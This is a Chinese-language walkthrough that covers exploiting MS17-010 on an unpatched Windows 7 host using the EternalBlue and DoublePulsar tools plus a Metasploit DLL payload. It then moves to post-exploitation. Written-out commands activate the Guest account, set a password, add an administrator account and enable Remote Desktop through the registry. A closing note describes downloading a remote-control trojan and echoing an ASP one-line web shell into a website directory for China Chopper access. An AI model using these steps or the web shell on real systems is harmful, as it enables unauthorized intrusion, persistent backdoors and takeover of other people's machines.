ms17-010 漏洞利用並拿下服務器教程
攻擊環境:
攻擊機win2003
ip:192.168.150.129
Window2003 Python環境及工具
攻擊機kali:
ip:192.168.150.128
目標主機window7 x64(未裝smb 漏洞補丁)
ip:192.168.150.131
演示操作
第一步:在攻擊機Window2003 上進行如下操作
安裝以下python工具(32位或64位)並配置系統環境變量
解壓到C盤
注意,所有環境安裝配置好之后,我們在FUZZBUNCH目錄下以CMD形式執行python fb.py命令,將會提示未找到“Listening post”錯誤,原因在於指定運行配置屬性為空,所以,我們可以用編輯器把fb.py源碼的第72行“Listening post”相關部分注釋掉:
另外,在相同目錄下找到Fuzzbunch.xml文件,用我們本地系統相關路徑把其中的第19行和第24行路徑進行覆蓋,如下圖所示:
FUZZBUNCH可以正常運行:
FUZZBUNCH的初始化過程中,將會需要輸入攻擊目標IP(win7)和回連控制IP(kali),如下圖所示:
用EternalBlue攻擊並入侵Windows 7/2008
其它配置默認即可(可以直接更改)
再次確定參數
開啟攻擊,並看到Success
第二步:在另一台攻擊機Kali上進行如下操作
1) 在Kali內生成一個Dll劫持文件。
2) 生成的ms17.dll放在Window 2003的C盤內,即C:\ms17.dll
3) 開啟並配置msf
4)攻擊:exploit 並等待反鏈接
第三步:攻擊機Window2003上操作
1) use Doublepulsar
2) 默認配置即可
3) 攻擊成功
第四步:在Kali上控制靶機(win7)
1)在Kali上成功獲取會話,可以進行任意操作
3) 獲取一個shell
4)查看當前權限
(可以激活Guest用戶輸入命令
net user guest /active:yes
添加密碼net user guest 123.com)
5)創建用戶hacker並加入管理員組
6)查看開放端口
7)開啟3389端口(win7)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
8)3389開啟成功
9)遠程桌面連接
用剛才創建的hacker賬戶登錄
登錄成功
注:
溢出后也不一定要非要在cmdshell下開啟遠程桌面服務;可以echo一個vbs文件,下載遠程控制木馬,然后在cmdshell里運行一下木馬即可連接;還有就是查詢目標IP是否綁定有網站,如果有則找到網站目錄,再用echo個一句話木馬進去(命令是:echo "<%execute request("cmd")%>" > WEB路徑/123.asp),用中國年菜刀連接,然后上傳大馬,或者上傳開3389的工具再開啟也行。